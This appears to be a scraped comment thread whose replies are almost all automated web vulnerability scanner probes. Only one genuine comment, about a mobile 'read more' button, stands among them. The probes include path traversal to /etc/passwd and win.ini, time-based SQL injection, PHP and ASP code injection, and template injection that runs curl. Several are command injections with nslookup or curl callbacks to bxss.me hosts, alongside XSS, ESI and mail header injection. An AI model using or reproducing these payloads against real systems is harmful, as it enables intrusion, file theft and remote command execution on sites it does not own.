../../../../../../../../../../../../../../windows/win.ini
re: Just_Ingest
file:///etc/passwd
re: Just_Ingest
../../../../../../../../../../../../../../../proc/version
re: Just_Ingest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Just_Ingest
)
re: Just_Ingest
../../../../../../../../../../etc/passwd%00.jpg
re: Just_Ingest
!(()&&!|*|*|
re: Just_Ingest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Just_Ingest
^(#$!@#$)(()))******
re: Just_Ingest
'.gethostbyname(lc('hitep'.'frrbhkan326bb.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(77).chr(100).chr(85).'
re: Just_Ingest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Just_Ingest
".gethostbyname(lc("hitbv"."shgodlag88435.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(86).chr(107).chr(87)."
re: Just_Ingest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Just_Ingest
/etc/passwd
re: Just_Ingest
echo qujmcn$()\ uqsmnp\nz^xyu||a #' &echo qujmcn$()\ uqsmnp\nz^xyu||a #|" &echo qujmcn$()\ uqsmnp\nz^xyu||a #
re: Just_Ingest
%2fetc%2fpasswd
re: Just_Ingest
&echo kpnntr$()\ idkxys\nz^xyu||a #' &echo kpnntr$()\ idkxys\nz^xyu||a #|" &echo kpnntr$()\ idkxys\nz^xyu||a #
re: Just_Ingest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Just_Ingest
|echo njkztz$()\ bzvmtc\nz^xyu||a #' |echo njkztz$()\ bzvmtc\nz^xyu||a #|" |echo njkztz$()\ bzvmtc\nz^xyu||a #
re: Just_Ingest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Just_Ingest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Just_Ingest
(nslookup hitltkyyvnrwmcac03.bxss.me||perl -e "gethostbyname('hitltkyyvnrwmcac03.bxss.me')")
re: Just_Ingest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Just_Ingest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Just_Ingest
"+"A".concat(70-3).concat(22*4).concat(103).concat(76).concat(108).concat(74)+(require"socket"
Socket.gethostbyname("hitdk"+"bjbfqalpf3e6b.bxss.me.")[3].to_s)+"
re: Just_Ingest
HttP://bxss.me/t/xss.html?%00
re: Just_Ingest
$(nslookup hitpuonqcuqvzb736f.bxss.me||perl -e "gethostbyname('hitpuonqcuqvzb736f.bxss.me')")
re: Just_Ingest
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Just_Ingest
Http://bxss.me/t/fit.txt
re: Just_Ingest
'+'A'.concat(70-3).concat(22*4).concat(104).concat(74).concat(122).concat(66)+(require'socket'
Socket.gethostbyname('hitsn'+'wroquprl01e36.bxss.me.')[3].to_s)+'
re: Just_Ingest
bxss.me/t/xss.html?%00
re: Just_Ingest
&nslookup hithwanzjyrby9b648.bxss.me&'\"`0&nslookup hithwanzjyrby9b648.bxss.me&`'
re: Just_Ingest
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Just_Ingest
http://bxss.me/t/fit.txt%3F.jpg
re: Just_Ingest
&(nslookup hitkcwsexhkvb53d0c.bxss.me||perl -e "gethostbyname('hitkcwsexhkvb53d0c.bxss.me')")&'\"`0&(nslookup hitkcwsexhkvb53d0c.bxss.me||perl -e "gethostbyname('hitkcwsexhkvb53d0c.bxss.me')")&`'
re: Just_Ingest
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Just_Ingest
/etc/shells
re: Just_Ingest
|(nslookup hiteztnovfoyha31ba.bxss.me||perl -e "gethostbyname('hiteztnovfoyha31ba.bxss.me')")
re: Just_Ingest
file:///etc/passwd
re: Just_Ingest
c:/windows/win.ini
re: Just_Ingest
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Just_Ingest
`(nslookup hituiislnfkkc3adb5.bxss.me||perl -e "gethostbyname('hituiislnfkkc3adb5.bxss.me')")`
re: Just_Ingest
/\../\../\../\../\../\../\../etc/passwd
re: Just_Ingest
bxss.me
re: Just_Ingest
;(nslookup hithilypbmoqw692a7.bxss.me||perl -e "gethostbyname('hithilypbmoqw692a7.bxss.me')")|(nslookup hithilypbmoqw692a7.bxss.me||perl -e "gethostbyname('hithilypbmoqw692a7.bxss.me')")&(nslookup hithilypbmoqw692a7.bxss.me||perl -e "gethostbyname('hithilypbmoqw692a7.bxss.me')")
re: Just_Ingest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Just_Ingest
/WEB-INF/web.xml
re: Just_Ingest
';print(md5(31337));$a='
re: Just_Ingest
C:\WINDOWS\system32\drivers\etc\hosts
re: Just_Ingest
";print(md5(31337));$a="
re: Just_Ingest
../../../../../../../../../../windows/win.ini%00.jpg
re: Just_Ingest
${@print(md5(31337))}
re: Just_Ingest
'"
re: Just_Ingest
/../../../../../../../../../../boot.ini
re: Just_Ingest
${@print(md5(31337))}\
re: Just_Ingest
<!--
re: Just_Ingest
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Just_Ingest
'.print(md5(31337)).'
re: Just_Ingest
..\..\..\..\..\..\..\..\windows\win.ini
re: Just_Ingest
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Just_Ingest
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Just_Ingest
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Just_Ingest
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Just_Ingest
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Just_Ingest
WEB-INF/web.xml
re: Just_Ingest
WEB-INF\web.xml
re: Just_Ingest
1
re: Just_Ingest
1
re: Just_Ingest
-1 OR 2+917-917-1=0+0+0+1 --
re: Just_Ingest
-1 OR 3+917-917-1=0+0+0+1 --
re: Just_Ingest
-1 OR 2+439-439-1=0+0+0+1
re: Just_Ingest
-1 OR 3+439-439-1=0+0+0+1
re: Just_Ingest
-1' OR 2+170-170-1=0+0+0+1 --
re: Just_Ingest
-1' OR 3+170-170-1=0+0+0+1 --
re: Just_Ingest
-1' OR 2+958-958-1=0+0+0+1 or 'FpExpPIi'='
re: Just_Ingest
-1' OR 3+958-958-1=0+0+0+1 or 'FpExpPIi'='
re: Just_Ingest
-1" OR 2+960-960-1=0+0+0+1 --
re: Just_Ingest
-1" OR 3+960-960-1=0+0+0+1 --
re: Just_Ingest
if(now()=sysdate(),sleep(15),0)
re: Just_Ingest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Just_Ingest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Just_Ingest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Just_Ingest
-1; waitfor delay '0:0:15' --
re: Just_Ingest
-1); waitfor delay '0:0:15' --
re: Just_Ingest
1 waitfor delay '0:0:15' --
re: Just_Ingest
5jY0ikyK'; waitfor delay '0:0:15' --
re: Just_Ingest
16FC96S370
re: Just_Ingest
response.write(9774146*9438113)
re: Just_Ingest
'+response.write(9774146*9438113)+'
re: Just_Ingest
"+response.write(9774146*9438113)+"
re: Just_Ingest
../../../../../../../../../../../../../../etc/passwd
re: Just_Ingest
../../../../../../../../../../../../../../windows/win.ini
re: Just_Ingest
file:///etc/passwd
re: Just_Ingest
<esi:include src="http://bxss.me/rpb.png"/>
re: Just_Ingest
${9999264+9999788}
re: Just_Ingest
../
re: Just_Ingest
)
re: Just_Ingest
redirtest.acx
re: Just_Ingest
!(()&&!|*|*|
re: Just_Ingest
^(#$!@#$)(()))******
re: Just_Ingest
'.gethostbyname(lc('hitqp'.'pcxpoxihe1ac7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(69).chr(108).chr(83).'
re: Just_Ingest
echo vvvocl$()\ gtsbnj\nz^xyu||a #' &echo vvvocl$()\ gtsbnj\nz^xyu||a #|" &echo vvvocl$()\ gtsbnj\nz^xyu||a #
re: Just_Ingest
".gethostbyname(lc("hitqz"."nnceeadfbea99.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(87).chr(105).chr(72)."
re: Just_Ingest
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: Just_Ingest
&echo xgufmb$()\ zsebqy\nz^xyu||a #' &echo xgufmb$()\ zsebqy\nz^xyu||a #|" &echo xgufmb$()\ zsebqy\nz^xyu||a #
re: Just_Ingest
gethostbyname(lc('hitck'.'hqigckfl004b9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(83).chr(112).chr(83)
re: Just_Ingest
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: Just_Ingest
|echo xckzxz$()\ knhngq\nz^xyu||a #' |echo xckzxz$()\ knhngq\nz^xyu||a #|" |echo xckzxz$()\ knhngq\nz^xyu||a #
re: Just_Ingest
/etc/shells
re: Just_Ingest
expr 9000160649 - 924812
re: Just_Ingest
../../../../../../../../../../../../../../etc/shells
re: Just_Ingest
(nslookup -q=cname hitgcmkmiwmrl483e2.bxss.me||curl hitgcmkmiwmrl483e2.bxss.me))
re: Just_Ingest
c:/windows/win.ini
re: Just_Ingest
$(nslookup -q=cname hitdwjhtywsuk63fb2.bxss.me||curl hitdwjhtywsuk63fb2.bxss.me)
re: Just_Ingest
bxss.me
re: Just_Ingest
ctime
sleep
p0
(I30
tp1
Rp2
.
re: Just_Ingest
&nslookup -q=cname hitqwofvlmnws527ab.bxss.me&'\"`0&nslookup -q=cname hitqwofvlmnws527ab.bxss.me&`'
re: Just_Ingest
Http://bxss.me/t/fit.txt
re: Just_Ingest
&(nslookup -q=cname hitkiwrensyngb1aba.bxss.me||curl hitkiwrensyngb1aba.bxss.me)&'\"`0&(nslookup -q=cname hitkiwrensyngb1aba.bxss.me||curl hitkiwrensyngb1aba.bxss.me)&`'
re: Just_Ingest
http://bxss.me/t/fit.txt?.jpg
re: Just_Ingest
|(nslookup -q=cname hitiihuzbioql59d9b.bxss.me||curl hitiihuzbioql59d9b.bxss.me)
re: Just_Ingest
`(nslookup -q=cname hitevknpcdgby64d77.bxss.me||curl hitevknpcdgby64d77.bxss.me)`
re: Just_Ingest
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Just_Ingest
;(nslookup -q=cname hitjvjibsptxu33aa1.bxss.me||curl hitjvjibsptxu33aa1.bxss.me)|(nslookup -q=cname hitjvjibsptxu33aa1.bxss.me||curl hitjvjibsptxu33aa1.bxss.me)&(nslookup -q=cname hitjvjibsptxu33aa1.bxss.me||curl hitjvjibsptxu33aa1.bxss.me)
re: Just_Ingest
';print(md5(31337));$a='
re: Just_Ingest
'"()
re: Just_Ingest
|(nslookup${IFS}-q${IFS}cname${IFS}hitrugbnlasjgc054c.bxss.me||curl${IFS}hitrugbnlasjgc054c.bxss.me)
re: Just_Ingest
";print(md5(31337));$a="
re: Just_Ingest
'&&sleep(27*1000)*ibcshx&&'
re: Just_Ingest
&(nslookup${IFS}-q${IFS}cname${IFS}hitnoheejwiewec487.bxss.me||curl${IFS}hitnoheejwiewec487.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitnoheejwiewec487.bxss.me||curl${IFS}hitnoheejwiewec487.bxss.me)&`'
re: Just_Ingest
${@print(md5(31337))}
re: Just_Ingest
"&&sleep(27*1000)*qyefyd&&"
re: Just_Ingest
${@print(md5(31337))}\
re: Just_Ingest
'||sleep(27*1000)*lgfkog||'
re: Just_Ingest
'.print(md5(31337)).'
re: Just_Ingest
"||sleep(27*1000)*gnyeql||"
re: Just_Ingest
HttP://bxss.me/t/xss.html?%00
re: Just_Ingest
bxss.me/t/xss.html?%00
re: Just_Ingest
"+"A".concat(70-3).concat(22*4).concat(116).concat(81).concat(100).concat(65)+(require"socket"
Socket.gethostbyname("hitil"+"ulrauxmfbc9d7.bxss.me.")[3].to_s)+"
re: Just_Ingest
'+'A'.concat(70-3).concat(22*4).concat(100).concat(77).concat(110).concat(72)+(require'socket'
Socket.gethostbyname('hitmo'+'fpmasngd80abc.bxss.me.')[3].to_s)+'
re: Just_Ingest
'A'.concat(70-3).concat(22*4).concat(118).concat(76).concat(102).concat(75)+(require'socket'
Socket.gethostbyname('hitgu'+'daonarfdb4387.bxss.me.')[3].to_s)
re: Just_Ingest
replies
re: Just_Ingest
replies�
re: Just_Ingest
replies/.
re: Just_Ingest
'"
re: Just_Ingest
<!--
re: Just_Ingest
'"()&%<zzz><ScRiPt >PsPo(9096)</ScRiPt>
re: Just_Ingest
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitxivxbnixlp5f459.bxss.me")}}
re: Just_Ingest
'"()&%<zzz><ScRiPt >PsPo(9991)</ScRiPt>
re: Just_Ingest
9231515
re: Just_Ingest
32DQIG6P
re: Just_Ingest
*1
re: Just_Ingest
*1
re: Just_Ingest
*1
re: Just_Ingest
*1
re: Just_Ingest
-1 OR 5*5=25 --
re: Just_Ingest
-1 OR 5*5=26 --
re: Just_Ingest
-1 OR 5*5=25
re: Just_Ingest
-1 OR 5*5=26
re: Just_Ingest
*if(now()=sysdate(),sleep(15),0)
re: Just_Ingest
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: Just_Ingest
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: Just_Ingest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Just_Ingest
-1; waitfor delay '0:0:15' --
re: Just_Ingest
-1); waitfor delay '0:0:15' --
re: Just_Ingest
-1 waitfor delay '0:0:15' --
re: Just_Ingest
QHWWrnjK'; waitfor delay '0:0:15' --
re: Just_Ingest
-1 OR 749=(SELECT 749 FROM PG_SLEEP(15))--
re: Just_Ingest
-1) OR 705=(SELECT 705 FROM PG_SLEEP(15))--
re: Just_Ingest
-1)) OR 912=(SELECT 912 FROM PG_SLEEP(15))--
re: Just_Ingest
ufhOjvcU' OR 39=(SELECT 39 FROM PG_SLEEP(15))--
re: Just_Ingest
il3CuetX') OR 818=(SELECT 818 FROM PG_SLEEP(15))--
re: Just_Ingest
NxLh0efE')) OR 328=(SELECT 328 FROM PG_SLEEP(15))--
re: Just_Ingest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Just_Ingest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Just_Ingest
'||(select 1 from (select pg_sleep(15))x)||'
re: Just_Ingest
''||(select 1 from (select pg_sleep(15))x)||''
re: Just_Ingest
'"
re: Just_Ingest
@@ahTKg
re: Just_Ingest
(select 198766*667891)
re: Just_Ingest
(select 198766*667891 from DUAL)
The read more button works when you access the site from computer, just not for mobile(android chrome). Have tried from chrome and edge.
re: Yee How
0QuITOAZ
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
1*
re: Yee How
-1 OR 2+643-643-1=0+0+0+1
re: Yee How
-1 OR 3+643-643-1=0+0+0+1
re: Yee How
if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
1 waitfor delay '0:0:15' --
re: Yee How
ltEQhohg'; waitfor delay '0:0:15' --
re: Yee How
-5 OR 982=(SELECT 982 FROM PG_SLEEP(15))--
re: Yee How
-5) OR 387=(SELECT 387 FROM PG_SLEEP(15))--
re: Yee How
-1)) OR 650=(SELECT 650 FROM PG_SLEEP(15))--
re: Yee How
ZSMbFH01' OR 731=(SELECT 731 FROM PG_SLEEP(15))--
re: Yee How
qsOCIxE8') OR 737=(SELECT 737 FROM PG_SLEEP(15))--
re: Yee How
LzD1TXUK')) OR 55=(SELECT 55 FROM PG_SLEEP(15))--
re: Yee How
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Yee How
'||(select 1 from (select pg_sleep(15))x)||'
re: Yee How
''||(select 1 from (select pg_sleep(15))x)||''
re: Yee How
1'"
re: Yee How
@@uxIQJ
re: Yee How
1EGIBbS3iO
re: Yee How
response.write(9480297*9187836)
re: Yee How
'+response.write(9480297*9187836)+'
re: Yee How
"+response.write(9480297*9187836)+"
re: Yee How
%0abcc:074625.67-22206.67.bf6fd.19990.2@bxss.me
re: Yee How
../../../../../../../../../../../../../../etc/passwd
re: Yee How
to@example.com>%0d%0abcc:074625.67-22207.67.bf6fd.19990.2@bxss.me
re: Yee How
../../../../../../../../../../../../../../windows/win.ini
re: Yee How
file:///etc/passwd
re: Yee How
../../../../../../../../../../../../../../../proc/version
re: Yee How
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Yee How
../../../../../../../../../../etc/passwd%00.jpg
re: Yee How
<esi:include src="http://bxss.me/rpb.png"/>
re: Yee How
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Yee How
echo segdcg$()\ lbxdes\nz^xyu||a #' &echo segdcg$()\ lbxdes\nz^xyu||a #|" &echo segdcg$()\ lbxdes\nz^xyu||a #
re: Yee How
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Yee How
${9999693+9999588}
re: Yee How
&echo axbjzu$()\ fbyfse\nz^xyu||a #' &echo axbjzu$()\ fbyfse\nz^xyu||a #|" &echo axbjzu$()\ fbyfse\nz^xyu||a #
re: Yee How
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Yee How
|echo nldger$()\ xouwnk\nz^xyu||a #' |echo nldger$()\ xouwnk\nz^xyu||a #|" |echo nldger$()\ xouwnk\nz^xyu||a #
re: Yee How
/etc/passwd
re: Yee How
(nslookup hitddmgwdloaj2ea50.bxss.me||perl -e "gethostbyname('hitddmgwdloaj2ea50.bxss.me')")
re: Yee How
%2fetc%2fpasswd
re: Yee How
$(nslookup hitfrwexzvctt9ad03.bxss.me||perl -e "gethostbyname('hitfrwexzvctt9ad03.bxss.me')")
re: Yee How
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Yee How
&nslookup hithpgpjiiztzd6bf6.bxss.me&'\"`0&nslookup hithpgpjiiztzd6bf6.bxss.me&`'
re: Yee How
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Yee How
